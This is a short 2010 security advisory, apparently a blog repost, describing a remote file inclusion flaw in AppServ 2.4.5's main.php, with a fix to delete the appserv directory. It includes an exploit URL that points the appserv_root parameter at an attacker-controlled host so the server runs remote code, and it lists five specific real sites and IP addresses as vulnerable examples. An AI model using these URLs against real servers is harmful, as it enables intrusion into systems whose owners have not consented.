2010.05.14 14:28

Remote file include in appserv 2.4.5

======================================================================
Remote file include in appserv 2.4.5 (possible in previous versions)
======================================================================

[ What is Appserv ]

AppServ is the Apache/PHP/MySQL open source software installer packages.

Objective : - Easy to buid Webserver and Database Server

- For those who just beginning client/server programming.

- For web programmers/developers using PHP & MySQL.

- For programming techniques that is easily to be ported to other platforms such as WindowZ

- Single step installation , no need to perform multiple step, time consuming installation and configuration.

- Ready-to-run just after you've finished installing.ready-to-run just after you've finished installing.

- If you hate and boring M$ IIS Webserver.

======================================================================

[ The bug ]

This in the directory appserv, file main.php:

======================================================================

include("$appserv_root/lang-english.php");

And another inclusion ( include("$appserv_root/lang-thai.php"); ), but with the same variable

======================================================================

[ Exploit ]

http://[target]/appserv/main.php?appserv_root=http://[attacker]/

======================================================================

[ Real examples ]

http://www.jr.ac.th/appserv/main.php?appserv_root=http://[attacker]/
http://140.116.83.224/appserv/main.php?appserv_root=http://[attacker]/
http://mail2.ttes.tcc.edu.tw/www2/appserv/main.php?appserv_root=http://[attacker]/
http://163.21.245.171/appserv/main.php?appserv_root=http://[attacker]/
http://trainer.ma.cx/appserv/main.php?appserv_root=http://[attacker]/

======================================================================

[ Fix ]

Eliminate the directory appserv (it does not have any utility)

======================================================================
Author: Xez
Contact: Xez.1337@gmail.com
Appserv website: www.appservnetwork.com
======================================================================


출처 : http://securityvulns.com/

Trackback 0 Comment 0